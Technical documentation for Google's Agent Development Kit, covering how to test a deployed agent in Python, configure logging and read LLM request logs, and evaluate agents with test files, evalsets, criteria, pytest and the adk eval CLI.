This request should generate a response from your deployed agent code in JSON format. For more information about interacting with a deployed ADK agent in Agent Engine using REST calls, see [Manage deployed agents](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/manage/overview#console) and [Use an Agent Development Kit agent](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/use/adk) in the Agent Engine documentation.

## Test using Python

You can use Python code for more sophisticated and repeatable testing of your agent deployed in Agent Engine. These instructions describe how to create a session with the deployed agent, and then send a request to the agent for processing.
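As a first step toward repeatable tests, the REST request bodies used in the previous section can be generated with the standard `json` module rather than edited by hand, which rules out syntax slips such as trailing commas. This is a sketch only: the helper names are hypothetical, while the field names (`class_method`, `input`, `user_id`, `session_id`, `message`) and the response shape are the ones shown in the REST examples.

```python
import json


def create_session_payload(user_id: str) -> str:
    """Serialize the request body that creates a session for a user."""
    return json.dumps(
        {"class_method": "async_create_session", "input": {"user_id": user_id}}
    )


def stream_query_payload(user_id: str, session_id: str, message: str) -> str:
    """Serialize the request body that sends a message within a session."""
    return json.dumps(
        {
            "class_method": "async_stream_query",
            "input": {
                "user_id": user_id,
                "session_id": session_id,
                "message": message,
            },
        }
    )


def extract_session_id(response_body: str) -> str:
    """Read the Session ID from a create-session response body."""
    return json.loads(response_body)["output"]["id"]


# Abbreviated create-session response, following the example shown earlier.
response = '{"output": {"userId": "u_123", "id": "4857885913439920384", "events": []}}'
session_id = extract_session_id(response)
print(stream_query_payload("u_123", session_id, "What is the weather in New York?"))
```

The resulting strings can be passed to `curl -d` or to any HTTP client as the request body.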
### Create a remote session

Use the `remote_app` object to create a connection to a deployed, remote agent:

```py
# If you are in a new script or used the ADK CLI to deploy, you can connect like this:
# from vertexai import agent_engines
# remote_app = agent_engines.get("your-agent-resource-name")

# Top-level `await` works in notebooks; in a script, wrap these calls in an
# async function and run it with `asyncio.run()`.
remote_session = await remote_app.async_create_session(user_id="u_456")
print(remote_session)
```

Expected output for `async_create_session` (remote):

```console
{'events': [],
 'user_id': 'u_456',
 'state': {},
 'id': '7543472750996750336',
 'app_name': '7917477678498709504',
 'last_update_time': 1743683353.030133}
```

The `id` value is the session ID, and `app_name` is the resource ID of the deployed agent on Agent Engine.

#### Send queries to your remote agent

```py
async for event in remote_app.async_stream_query(
    user_id="u_456",
    session_id=remote_session["id"],
    message="whats the weather in new york",
):
    print(event)
```

Expected output for `async_stream_query` (remote):

```console
{'parts': [{'function_call': {'id': 'af-f1906423-a531-4ecf-a1ef-723b05e85321', 'args': {'city': 'new york'}, 'name': 'get_weather'}}], 'role': 'model'}
{'parts': [{'function_response': {'id': 'af-f1906423-a531-4ecf-a1ef-723b05e85321', 'name': 'get_weather', 'response': {'status': 'success', 'report': 'The weather in New York is sunny with a temperature of 25 degrees Celsius (77 degrees Fahrenheit).'}}}], 'role': 'user'}
{'parts': [{'text': 'The weather in New York is sunny with a temperature of 25 degrees Celsius (77 degrees Fahrenheit).'}], 'role': 'model'}
```

For more information about interacting with a deployed ADK agent in Agent Engine, see [Manage deployed agents](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/manage/overview) and [Use an Agent Development Kit agent](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/use/adk) in the Agent Engine documentation.
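For repeatable checks, it can be useful to reduce the streamed events to the pieces a test cares about, such as the tools called and the text returned. The sketch below assumes each event is a dictionary shaped like the expected output above, with a `parts` list either at the top level or nested under a `content` key; the helper names are hypothetical and the sample events are abbreviated.

```python
from typing import Any, Iterable


def _parts(event: dict[str, Any]) -> list[dict[str, Any]]:
    """Return the parts of an event, whether or not they are nested in 'content'."""
    content = event.get("content") or event
    return content.get("parts") or []


def collect_text(events: Iterable[dict[str, Any]]) -> list[str]:
    """Gather every text part, in order, from a sequence of events."""
    return [part["text"] for event in events for part in _parts(event) if "text" in part]


def collect_tool_calls(events: Iterable[dict[str, Any]]) -> list[str]:
    """Gather the names of the tools the model asked to call, in order."""
    return [
        part["function_call"]["name"]
        for event in events
        for part in _parts(event)
        if "function_call" in part
    ]


# Abbreviated events modeled on the expected output above.
sample_events = [
    {"parts": [{"function_call": {"args": {"city": "new york"}, "name": "get_weather"}}], "role": "model"},
    {"parts": [{"function_response": {"name": "get_weather", "response": {"status": "success"}}}], "role": "user"},
    {"parts": [{"text": "The weather in New York is sunny."}], "role": "model"},
]

print(collect_tool_calls(sample_events))
print(collect_text(sample_events))
```

In a real test, the events would first be gathered into a list inside the `async for` loop and then passed to these helpers.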
### Sending Multimodal Queries To send multimodal queries (e.g., including images) to your agent, you can construct the `message` parameter of `async_stream_query` with a list of `types.Part` objects. Each part can be text or an image. To include an image, you can use `types.Part.from_uri`, providing a Google Cloud Storage (GCS) URI for the image. ```python from google.genai import types image_part = types.Part.from_uri( file_uri="gs://cloud-samples-data/generative-ai/image/scones.jpg", mime_type="image/jpeg", ) text_part = types.Part.from_text( text="What is in this image?", ) async for event in remote_app.async_stream_query( user_id="u_456", session_id=remote_session["id"], message=[text_part, image_part], ): print(event) ``` Note While the underlying communication with the model may involve Base64 encoding for images, the recommended and supported method for sending image data to an agent deployed on Agent Engine is by providing a GCS URI. ## Clean up deployments If you have performed deployments as tests, it is a good practice to clean up your cloud resources after you have finished. You can delete the deployed Agent Engine instance to avoid any unexpected charges on your Google Cloud account. ```python remote_app.delete(force=True) ``` The `force=True` parameter also deletes any child resources that were generated from the deployed agent, such as sessions. You can also delete your deployed agent via the [Agent Engine UI](https://console.cloud.google.com/vertex-ai/agents/agent-engines) on Google Cloud. # Observability for agents Observability for agents enables measurement of a system's internal state, including reasoning traces, tool calls, and latent model outputs, by analyzing its external telemetry and structured logs. When building agents, you may need these features to help debug and diagnose their in-process behavior. Basic input and output monitoring is typically insufficient for agents with any significant level of complexity. 
Agent Development Kit (ADK) provides configurable [logging](/adk-docs/observability/logging/) functionality for monitoring and debugging agents. However, you may need to consider more advanced [observability ADK Integrations](/adk-docs/integrations/?topic=observability) for monitoring and analysis. ADK Integrations for observability For a list of pre-built observability libraries for ADK, see [Tools and Integrations](/adk-docs/integrations/?topic=observability). # Agent activity logging Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 Agent Development Kit (ADK) uses Python's standard `logging` module to provide flexible and powerful logging capabilities. Understanding how to configure and interpret these logs is crucial for monitoring agent behavior and debugging issues effectively. ## Logging Philosophy ADK's approach to logging is to provide detailed diagnostic information without being overly verbose by default. It is designed to be configured by the application developer, allowing you to tailor the log output to your specific needs, whether in a development or production environment. - **Standard Library:** It uses the standard `logging` library, so any configuration or handler that works with it will work with ADK. - **Hierarchical Loggers:** Loggers are named hierarchically based on the module path (e.g., `google_adk.google.adk.agents.llm_agent`), allowing for fine-grained control over which parts of the framework produce logs. - **User-Configured:** The framework does not configure logging itself. It is the responsibility of the developer using the framework to set up the desired logging configuration in their application's entry point. ## How to Configure Logging You can configure logging in your main application script (e.g., `main.py`) before you initialize and run your agent. The simplest way is to use `logging.basicConfig`. 
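Because logger names are hierarchical, the level for ADK's loggers can also be set separately from the rest of the application. The following is a minimal sketch using only the standard `logging` module; it assumes ADK's loggers share the `google_adk` name prefix seen in the logger names in this guide, and the function name `configure_logging` is hypothetical.

```python
import logging


def configure_logging(adk_level: int = logging.DEBUG,
                      default_level: int = logging.WARNING) -> None:
    """Set a quiet default level and a more verbose level for ADK loggers."""
    logging.basicConfig(
        level=default_level,
        format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
        force=True,  # Replace any handlers configured earlier (Python 3.8+).
    )
    # Child loggers such as "google_adk.google.adk.models.google_llm" inherit
    # this level unless they set their own. The "google_adk" prefix is an
    # assumption based on the logger names shown in this guide.
    logging.getLogger("google_adk").setLevel(adk_level)


configure_logging()
```

This keeps third-party libraries at `WARNING` while ADK's own diagnostic messages remain visible.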
### Example Configuration To enable detailed logging, including `DEBUG` level messages, add the following to the top of your script: ```python import logging logging.basicConfig( level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(name)s - %(message)s' ) # Your ADK agent code follows... # from google.adk.agents import LlmAgent # ... ``` ### Configuring Logging with the ADK CLI When running agents using the ADK's built-in web or API servers, you can easily control the log verbosity directly from the command line. The `adk web`, `adk api_server`, and `adk deploy cloud_run` commands all accept a `--log_level` option. This provides a convenient way to set the logging level without modifying your agent's source code. > **Note:** The command-line setting always takes precedence over the programmatic configuration (like `logging.basicConfig`) for ADK's loggers. It's recommended to use `INFO` or `WARNING` in production and enable `DEBUG` only when troubleshooting. **Example using `adk web`:** To start the web server with `DEBUG` level logging, run: ```bash adk web --log_level DEBUG path/to/your/agents_dir ``` The available log levels for the `--log_level` option are: - `DEBUG` - `INFO` (default) - `WARNING` - `ERROR` - `CRITICAL` > You can also use `-v` or `--verbose` as a shortcut for `--log_level DEBUG`. > > ```bash > adk web -v path/to/your/agents_dir > ``` ### Log Levels ADK uses standard log levels to categorize messages. The configured level determines what information gets logged. 
| Level | Description | Type of Information Logged | | ------------- | ---------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **`DEBUG`** | **Crucial for debugging.** The most verbose level for fine-grained diagnostic information. | - **Full LLM Prompts:** The complete request sent to the language model, including system instructions, history, and tools. - Detailed API responses from services. - Internal state transitions and variable values. | | **`INFO`** | General information about the agent's lifecycle. | - Agent initialization and startup. - Session creation and deletion events. - Execution of a tool, including its name and arguments. | | **`WARNING`** | Indicates a potential issue or deprecated feature use. The agent continues to function, but attention may be required. | - Use of deprecated methods or parameters. - Non-critical errors that the system recovered from. | | **`ERROR`** | A serious error that prevented an operation from completing. | - Failed API calls to external services (e.g., LLM, Session Service). - Unhandled exceptions during agent execution. - Configuration errors. | > **Note:** It is recommended to use `INFO` or `WARNING` in production environments. Only enable `DEBUG` when actively troubleshooting an issue, as `DEBUG` logs can be very verbose and may contain sensitive information. ## Reading and Understanding the Logs The `format` string in the `basicConfig` example determines the structure of each log message. Here’s a sample log entry: ```text 2025-07-08 11:22:33,456 - DEBUG - google_adk.google.adk.models.google_llm - LLM Request: contents { ... 
}
```

| Log Segment                               | Format Specifier | Meaning                                        |
| ----------------------------------------- | ---------------- | ---------------------------------------------- |
| `2025-07-08 11:22:33,456`                 | `%(asctime)s`    | Timestamp                                      |
| `DEBUG`                                   | `%(levelname)s`  | Severity level                                 |
| `google_adk.google.adk.models.google_llm` | `%(name)s`       | Logger name (the module that produced the log) |
| `LLM Request: contents { ... }`           | `%(message)s`    | The actual log message                         |

By reading the logger name, you can immediately pinpoint the source of the log and understand its context within the agent's architecture.

## Debugging with Logs: A Practical Example

**Scenario:** Your agent is not producing the expected output, and you suspect the prompt being sent to the LLM is incorrect or missing information.

**Steps:**

1. **Enable DEBUG Logging:** In your `main.py`, set the logging level to `DEBUG` as shown in the configuration example.

    ```python
    import logging

    logging.basicConfig(
        level=logging.DEBUG,
        format='%(asctime)s - %(levelname)s - %(name)s - %(message)s'
    )
    ```

1. **Run Your Agent:** Execute your agent's task as you normally would.

1. **Inspect the Logs:** Look through the console output for a message from the `google_adk.google.adk.models.google_llm` logger that starts with `LLM Request:`.

```text
...
2025-07-10 15:26:13,778 - DEBUG - google_adk.google.adk.models.google_llm - Sending out request, model: gemini-2.0-flash, backend: GoogleLLMVariant.GEMINI_API, stream: False
2025-07-10 15:26:13,778 - DEBUG - google_adk.google.adk.models.google_llm - LLM Request:
-----------------------------------------------------------
System Instruction:
You roll dice and answer questions about the outcome of the dice rolls. You can roll dice of different sizes. You can use multiple tools in parallel by calling functions in parallel(in one request and in one round). It is ok to discuss previous dice roles, and comment on the dice rolls. When you are asked to roll a die, you must call the roll_die tool with the number of sides.
Be sure to pass in an integer. Do not pass in a string. You should never roll a die on your own. When checking prime numbers, call the check_prime tool with a list of integers. Be sure to pass in a list of integers. You should never pass in a string. You should not check prime numbers before calling the tool. When you are asked to roll a die and check prime numbers, you should always make the following two function calls: 1. You should first call the roll_die tool to get a roll. Wait for the function response before calling the check_prime tool. 2. After you get the function response from roll_die tool, you should call the check_prime tool with the roll_die result. 2.1 If user asks you to check primes based on previous rolls, make sure you include the previous rolls in the list. 3. When you respond, you must include the roll_die result from step 1. You should always perform the previous 3 steps when asking for a roll and checking prime numbers. You should not rely on the previous history on prime results. You are an agent. Your internal name is "hello_world_agent". The description about you is "hello world agent that can roll a dice of 8 sides and check prime numbers." ----------------------------------------------------------- Contents: {"parts":[{"text":"Roll a 6 sided dice"}],"role":"user"} {"parts":[{"function_call":{"args":{"sides":6},"name":"roll_die"}}],"role":"model"} {"parts":[{"function_response":{"name":"roll_die","response":{"result":2}}}],"role":"user"} ----------------------------------------------------------- Functions: roll_die: {'sides': {'type': }} check_prime: {'nums': {'items': {'type': }, 'type': }} ----------------------------------------------------------- 2025-07-10 15:26:13,779 - INFO - google_genai.models - AFC is enabled with max remote calls: 10. 
2025-07-10 15:26:14,309 - INFO - google_adk.google.adk.models.google_llm - LLM Response:
-----------------------------------------------------------
Text:
I have rolled a 6 sided die, and the result is 2.
...
```

1. **Analyze the Prompt:** By examining the `System Instruction`, `Contents`, and `Functions` sections of the logged request, you can verify:
    - Is the system instruction correct?
    - Is the conversation history (`user` and `model` turns) accurate?
    - Is the most recent user query included?
    - Are the correct tools being provided to the model?
    - Are the tools correctly called by the model?
    - How long does the model take to respond?

This detailed output allows you to diagnose a wide range of issues, from incorrect prompt engineering to problems with tool definitions, directly from the log files.

# Why Evaluate Agents

Supported in ADK: Python

In traditional software development, unit tests and integration tests provide confidence that code functions as expected and remains stable through changes. These tests provide a clear "pass/fail" signal, guiding further development. However, LLM agents introduce a level of variability that makes traditional testing approaches insufficient.

Due to the probabilistic nature of models, deterministic "pass/fail" assertions are often unsuitable for evaluating agent performance. Instead, we need qualitative evaluations of both the final output and the agent's trajectory, that is, the sequence of steps taken to reach the solution. This involves assessing the quality of the agent's decisions, its reasoning process, and the final result.

This may seem like a lot of extra work to set up, but the investment in automating evaluations pays off quickly. If you intend to progress beyond a prototype, this is a highly recommended best practice.

## Preparing for Agent Evaluations

Before automating agent evaluations, define clear objectives and success criteria:

- **Define Success:** What constitutes a successful outcome for your agent?
- **Identify Critical Tasks:** What are the essential tasks your agent must accomplish?
- **Choose Relevant Metrics:** What metrics will you track to measure performance?

These considerations will guide the creation of evaluation scenarios and enable effective monitoring of agent behavior in real-world deployments.

## What to Evaluate?

To bridge the gap between a proof-of-concept and a production-ready AI agent, a robust and automated evaluation framework is essential. Unlike evaluating generative models, where the focus is primarily on the final output, agent evaluation requires a deeper understanding of the decision-making process. Agent evaluation can be broken down into two components:

1. **Evaluating Trajectory and Tool Use:** Analyzing the steps an agent takes to reach a solution, including its choice of tools, strategies, and the efficiency of its approach.
1. **Evaluating the Final Response:** Assessing the quality, relevance, and correctness of the agent's final output.

The trajectory is just a list of steps the agent took before it responded to the user. We can compare that against the list of steps we expect the agent to have taken.

### Evaluating trajectory and tool use

Before responding to a user, an agent typically performs a series of actions, which we refer to as a 'trajectory'. It might compare the user input with session history to disambiguate a term, look up a policy document, search a knowledge base, or invoke an API to save a ticket. Evaluating an agent's performance requires comparing its actual trajectory to an expected, or ideal, one. This comparison can reveal errors and inefficiencies in the agent's process. The expected trajectory represents the ground truth: the list of steps we anticipate the agent should take.
For example:

```python
# Trajectory evaluation compares the expected steps with the steps actually taken.
expected_steps = ["determine_intent", "use_tool", "review_results", "report_generation"]
actual_steps = ["determine_intent", "use_tool", "review_results", "report_generation"]

# An exact, in-order match is the strictest form of comparison.
trajectory_matches = actual_steps == expected_steps
```

ADK provides both ground-truth-based and rubric-based tool use evaluation metrics. To select the appropriate metric for your agent's specific requirements and goals, please refer to our [recommendations](#recommendations-on-criteria).

## How Evaluation works with the ADK

The ADK offers two methods for evaluating agent performance against predefined datasets and evaluation criteria. While conceptually similar, they differ in the amount of data they can process, which typically dictates the appropriate use case for each.

### First approach: Using a test file

This approach involves creating individual test files, each representing a single, simple agent-model interaction (a session). It's most effective during active agent development, serving as a form of unit testing. These tests are designed for rapid execution and should focus on sessions of low complexity.

Each test file contains a single session, which may consist of multiple turns. A turn represents a single interaction between the user and the agent. Each turn includes:

- `User Content`: The query issued by the user.
- `Expected Intermediate Tool Use Trajectory`: The tool calls we expect the agent to make in order to respond correctly to the user query.
- `Expected Intermediate Agent Responses`: These are the natural language responses that the agent (or sub-agents) generates as it moves towards generating a final answer. These natural language responses are usually an artifact of a multi-agent system, where your root agent depends on sub-agents to achieve a goal.
  These intermediate responses may or may not be of interest to the end user, but for a developer or owner of the system they are of critical importance, because they give you confidence that the agent took the right path to generate the final response.
- `Final Response`: The expected final response from the agent.

You can give the file any name, for example `evaluation.test.json`. The framework only checks for the `.test.json` suffix, and the preceding part of the filename is not constrained. The test files are backed by a formal Pydantic data model. The two key schema files are [Eval Set](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_set.py) and [Eval Case](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_case.py). Here is a test file with a few examples:

*(Note: Comments are included for explanatory purposes and should be removed for the JSON to be valid.)*

```json
# Do note that some fields are removed for sake of making this doc readable.
{
  "eval_set_id": "home_automation_agent_light_on_off_set",
  "name": "",
  "description": "This is an eval set that is used for unit testing `x` behavior of the Agent",
  "eval_cases": [
    {
      "eval_id": "eval_case_id",
      "conversation": [
        {
          "invocation_id": "b7982664-0ab6-47cc-ab13-326656afdf75", # Unique identifier for the invocation.
          "user_content": { # Content provided by the user in this invocation. This is the query.
            "parts": [
              {
                "text": "Turn off device_2 in the Bedroom."
              }
            ],
            "role": "user"
          },
          "final_response": { # Final response from the agent, used as the reference (benchmark).
            "parts": [
              {
                "text": "I have set the device_2 status to off."
              }
            ],
            "role": "model"
          },
          "intermediate_data": {
            "tool_uses": [ # Tool use trajectory in chronological order.
              {
                "args": {
                  "location": "Bedroom",
                  "device_id": "device_2",
                  "status": "OFF"
                },
                "name": "set_device_info"
              }
            ],
            "intermediate_responses": [] # Any intermediate sub-agent responses.
          }
        }
      ],
      "session_input": { # Initial session input.
        "app_name": "home_automation_agent",
        "user_id": "test_user",
        "state": {}
      }
    }
  ]
}
```

Test files can be organized into folders. Optionally, a folder can also include a `test_config.json` file that specifies the evaluation criteria.

#### How to migrate test files not backed by the Pydantic schema?

NOTE: If your test files don't adhere to the [EvalSet](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_set.py) schema, then this section is relevant to you.

Please use `AgentEvaluator.migrate_eval_data_to_new_schema` to migrate your existing `*.test.json` files to the Pydantic-backed schema. The utility takes your current test data file and an optional initial session file, and generates a single output JSON file with data serialized in the new format. Given that the new schema is more cohesive, both the old test data file and the initial session file can be ignored (or removed).

### Second approach: Using An Evalset File

The evalset approach utilizes a dedicated dataset called an "evalset" for evaluating agent-model interactions. Similar to a test file, the evalset contains example interactions. However, an evalset can contain multiple, potentially lengthy sessions, making it ideal for simulating complex, multi-turn conversations. Due to its ability to represent complex sessions, the evalset is well-suited for integration tests. These tests are typically run less frequently than unit tests due to their more extensive nature.

An evalset file contains multiple "evals," each representing a distinct session. Each eval consists of one or more "turns," which include the user query, expected tool use, expected intermediate agent responses, and a reference response. These fields have the same meaning as they do in the test file approach. Alternatively, an eval can define a *conversation scenario* which is used to [dynamically simulate](https://google.github.io/adk-docs/evaluate/user-sim/index.md) a user interaction with the agent.
Each eval is identified by a unique name. Furthermore, each eval includes an associated initial session state. Creating evalsets manually can be complex, therefore UI tools are provided to help capture relevant sessions and easily convert them into evals within your evalset. Learn more about using the web UI for evaluation below. Here is an example evalset containing two sessions. The eval set files are backed by a formal Pydantic data model. The two key schema files are [Eval Set](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_set.py) and [Eval Case](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_case.py). Warning This evalset evaluation method requires the use of a paid service, [Vertex Gen AI Evaluation Service API](https://cloud.google.com/vertex-ai/generative-ai/docs/model-reference/evaluation). *(Note: Comments are included for explanatory purposes and should be removed for the JSON to be valid.)* ```json # Do note that some fields are removed for sake of making this doc readable. { "eval_set_id": "eval_set_example_with_multiple_sessions", "name": "Eval set with multiple sessions", "description": "This eval set is an example that shows that an eval set can have more than one session.", "eval_cases": [ { "eval_id": "session_01", "conversation": [ { "invocation_id": "e-0067f6c4-ac27-4f24-81d7-3ab994c28768", "user_content": { "parts": [ { "text": "What can you do?" } ], "role": "user" }, "final_response": { "parts": [ { "text": "I can roll dice of different sizes and check if numbers are prime." 
} ], "role": null }, "intermediate_data": { "tool_uses": [], "intermediate_responses": [] } } ], "session_input": { "app_name": "hello_world", "user_id": "user", "state": {} } }, { "eval_id": "session_02", "conversation": [ { "invocation_id": "e-92d34c6d-0a1b-452a-ba90-33af2838647a", "user_content": { "parts": [ { "text": "Roll a 19 sided dice" } ], "role": "user" }, "final_response": { "parts": [ { "text": "I rolled a 17." } ], "role": null }, "intermediate_data": { "tool_uses": [], "intermediate_responses": [] } }, { "invocation_id": "e-bf8549a1-2a61-4ecc-a4ee-4efbbf25a8ea", "user_content": { "parts": [ { "text": "Roll a 10 sided dice twice and then check if 9 is a prime or not" } ], "role": "user" }, "final_response": { "parts": [ { "text": "I got 4 and 7 from the dice roll, and 9 is not a prime number.\n" } ], "role": null }, "intermediate_data": { "tool_uses": [ { "id": "adk-1a3f5a01-1782-4530-949f-07cf53fc6f05", "args": { "sides": 10 }, "name": "roll_die" }, { "id": "adk-52fc3269-caaf-41c3-833d-511e454c7058", "args": { "sides": 10 }, "name": "roll_die" }, { "id": "adk-5274768e-9ec5-4915-b6cf-f5d7f0387056", "args": { "nums": [ 9 ] }, "name": "check_prime" } ], "intermediate_responses": [ [ "data_processing_agent", [ { "text": "I have rolled a 10 sided die twice. The first roll is 5 and the second roll is 3.\n" } ] ] ] } } ], "session_input": { "app_name": "hello_world", "user_id": "user", "state": {} } } ] } ``` #### How to migrate eval set files not backed by the Pydantic schema? NOTE: If your eval set files don't adhere to [EvalSet](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_set.py) schema file, then this section is relevant to you. Based on who is maintaining the eval set data, there are two routes: 1. **Eval set data maintained by ADK UI** If you use ADK UI to maintain your Eval set data then *no action is needed* from you. 1. 
**Eval set data is developed and maintained manually and used in ADK eval CLI** A migration tool is in the works; until then, the ADK eval CLI command will continue to support data in the old format.

### Evaluation Criteria

ADK provides several built-in criteria for evaluating agent performance, ranging from tool trajectory matching to LLM-based response quality assessment. For a detailed list of available criteria and guidance on when to use them, please see [Evaluation Criteria](https://google.github.io/adk-docs/evaluate/criteria/index.md).

Here is a summary of all the available criteria:

- **tool_trajectory_avg_score**: Exact match of tool call trajectory.
- **response_match_score**: ROUGE-1 similarity to reference response.
- **final_response_match_v2**: LLM-judged semantic match to a reference response.
- **rubric_based_final_response_quality_v1**: LLM-judged final response quality based on custom rubrics.
- **rubric_based_tool_use_quality_v1**: LLM-judged tool usage quality based on custom rubrics.
- **hallucinations_v1**: LLM-judged groundedness of agent response against context.
- **safety_v1**: Safety/harmlessness of agent response.

If no evaluation criteria are provided, the following default configuration is used:

- `tool_trajectory_avg_score`: Defaults to 1.0, requiring a 100% match in the tool usage trajectory.
- `response_match_score`: Defaults to 0.8, allowing for a small margin of error in the agent's natural language responses.

Here is an example of a `test_config.json` file specifying custom evaluation criteria:

```json
{
  "criteria": {
    "tool_trajectory_avg_score": 1.0,
    "response_match_score": 0.8
  }
}
```

#### Recommendations on Criteria

Choose criteria based on your evaluation goals:

- **Enable tests in CI/CD pipelines or regression testing:** Use `tool_trajectory_avg_score` and `response_match_score`. These criteria are fast, predictable, and suitable for frequent automated checks.
- **Evaluate trusted reference responses:** Use `final_response_match_v2` to evaluate semantic equivalence. This LLM-based check is more flexible than exact matching and better captures whether the agent's response means the same thing as the reference response.
- **Evaluate response quality without a reference response:** Use `rubric_based_final_response_quality_v1`. This is useful when you don't have a trusted reference, but you can define attributes of a good response (e.g., "The response is concise," "The response has a helpful tone").
- **Evaluate the correctness of tool usage:** Use `rubric_based_tool_use_quality_v1`. This allows you to validate the agent's reasoning process by checking, for example, that a specific tool was called or that tools were called in the correct order (e.g., "Tool A must be called before Tool B").
- **Check if responses are grounded in context:** Use `hallucinations_v1` to detect if the agent makes claims that are unsupported by or contradictory to the information available to it (e.g., tool outputs).
- **Check for harmful content:** Use `safety_v1` to ensure that agent responses are safe and do not violate safety policies.

In addition, criteria which require information on expected agent tool use and/or responses are not supported in combination with [User Simulation](https://google.github.io/adk-docs/evaluate/user-sim/index.md). Currently, only the `hallucinations_v1` and `safety_v1` criteria support such evals.

### User Simulation

When evaluating conversational agents, it is not always practical to use a fixed set of user prompts, as the conversation can proceed in unexpected ways. For example, if the agent needs the user to supply two values to perform a task, it may ask for those values one at a time or both at once. To resolve this issue, ADK allows you to test the behavior of the agent in a specific *conversation scenario* with user prompts that are dynamically generated by an AI model.
For details on how to set up an eval with user simulation, see [User Simulation](https://google.github.io/adk-docs/evaluate/user-sim/index.md). ## How to run Evaluation with the ADK As a developer, you can evaluate your agents using the ADK in the following ways: 1. **Web-based UI (**`adk web`**):** Evaluate agents interactively through a web-based interface. 1. **Programmatically (**`pytest`**)**: Integrate evaluation into your testing pipeline using `pytest` and test files. 1. **Command Line Interface (**`adk eval`**):** Run evaluations on an existing evaluation set file directly from the command line. ### 1. `adk web` - Run Evaluations via the Web UI The web UI provides an interactive way to evaluate agents, generate evaluation datasets, and inspect agent behavior in detail. #### Step 1: Create and Save a Test Case 1. Start the web server by running: `adk web ` 1. In the web interface, select an agent and interact with it to create a session. 1. Navigate to the **Eval** tab on the right side of the interface. 1. Create a new eval set or select an existing one. 1. Click **"Add current session"** to save the conversation as a new evaluation case. #### Step 2: View and Edit Your Test Case Once a case is saved, you can click its ID in the list to inspect it. To make changes, click the **Edit current eval case** icon (pencil). This interactive view allows you to: - **Modify** agent text responses to refine test scenarios. - **Delete** individual agent messages from the conversation. - **Delete** the entire evaluation case if it's no longer needed. #### Step 3: Run the Evaluation with Custom Metrics 1. Select one or more test cases from your evalset. 1. Click **Run Evaluation**. An **EVALUATION METRIC** dialog will appear. 1. In the dialog, use the sliders to configure the thresholds for: - **Tool trajectory avg score** - **Response match score** 1. Click **Start** to run the evaluation using your custom criteria. 
The evaluation history will record the metrics used for each run. #### Step 4: Analyze Results After the run completes, you can analyze the results: - **Analyze Run Failures**: Click on any **Pass** or **Fail** result. For failures, you can hover over the `Fail` label to see a side-by-side comparison of the **Actual vs. Expected Output** and the scores that caused the failure. ### Debugging with the Trace View The ADK web UI includes a powerful **Trace** tab for debugging agent behavior. This feature is available for any agent session, not just during evaluation. The **Trace** tab provides a detailed and interactive way to inspect your agent's execution flow. Traces are automatically grouped by user message, making it easy to follow the chain of events. Each trace row is interactive: - **Hovering** over a trace row highlights the corresponding message in the chat window. - **Clicking** on a trace row opens a detailed inspection panel with four tabs: - **Event**: The raw event data. - **Request**: The request sent to the model. - **Response**: The response received from the model. - **Graph**: A visual representation of the tool calls and agent logic flow. Blue rows in the trace view indicate that an event was generated from that interaction. Clicking on these blue rows will open the bottom event detail panel, providing deeper insights into the agent's execution flow. ### 2. `pytest` - Run Tests Programmatically You can also use **`pytest`** to run test files as part of your integration tests. 
#### Example Command

```shell
pytest tests/integration/
```

#### Example Test Code

Here is an example of a `pytest` test case that runs a single test file:

```py
from google.adk.evaluation.agent_evaluator import AgentEvaluator
import pytest


@pytest.mark.asyncio
async def test_with_single_test_file():
    """Test the agent's basic ability via a session file."""
    await AgentEvaluator.evaluate(
        agent_module="home_automation_agent",
        eval_dataset_file_path_or_dir="tests/integration/fixture/home_automation_agent/simple_test.test.json",
    )
```

This approach allows you to integrate agent evaluations into your CI/CD pipelines or larger test suites. If you want to specify the initial session state for your tests, you can do that by storing the session details in a file and passing that file to the `AgentEvaluator.evaluate` method.

### 3. `adk eval` - Run Evaluations via the CLI

You can also evaluate an eval set file through the command line interface (CLI). This runs the same evaluation that runs in the UI, but it helps with automation: you can add this command as part of your regular build generation and verification process.

Here is the command:

```shell
adk eval \
    <AGENT_MODULE_FILE_PATH> \
    <EVAL_SET_FILE_PATH> \
    [--config_file_path=<CONFIG_FILE_PATH>] \
    [--print_detailed_results]
```

For example:

```shell
adk eval \
    samples_for_testing/hello_world \
    samples_for_testing/hello_world/hello_world_eval_set_001.evalset.json
```

Here are the details for each command line argument:

- `AGENT_MODULE_FILE_PATH`: The path to the `__init__.py` file that contains a module by the name "agent". The "agent" module contains a `root_agent`.
- `EVAL_SET_FILE_PATH`: The path to the evaluation file(s). You can specify one or more eval set file paths. For each file, all evals will be run by default. If you want to run only specific evals from an eval set, first create a comma-separated list of eval names and then add it as a suffix to the eval set file name, demarcated by a colon `:`.
  - For example: `sample_eval_set_file.json:eval_1,eval_2,eval_3`. This will only run `eval_1`, `eval_2`, and `eval_3` from `sample_eval_set_file.json`.
- `CONFIG_FILE_PATH`: The path to the config file.
- `PRINT_DETAILED_RESULTS`: Prints detailed results on the console.

# Evaluation Criteria

Supported in ADK: Python

This page outlines the evaluation criteria provided by ADK to assess agent performance, including tool use trajectory, response quality, and safety.

| Criterion | Description | Reference-Based | Requires Rubrics | LLM-as-a-Judge | Supports [User Simulation](https://google.github.io/adk-docs/evaluate/user-sim/index.md) |
| ---------------------------------------- | --------------------------------------------------------- | --------------- | ---------------- | -------------- | ---------------------------------------------------------------------------------------- |
| `tool_trajectory_avg_score` | Exact match of tool call trajectory | Yes | No | No | No |
| `response_match_score` | ROUGE-1 similarity to reference response | Yes | No | No | No |
| `final_response_match_v2` | LLM-judged semantic match to reference response | Yes | No | Yes | No |
| `rubric_based_final_response_quality_v1` | LLM-judged final response quality based on custom rubrics | No | Yes | Yes | Yes |
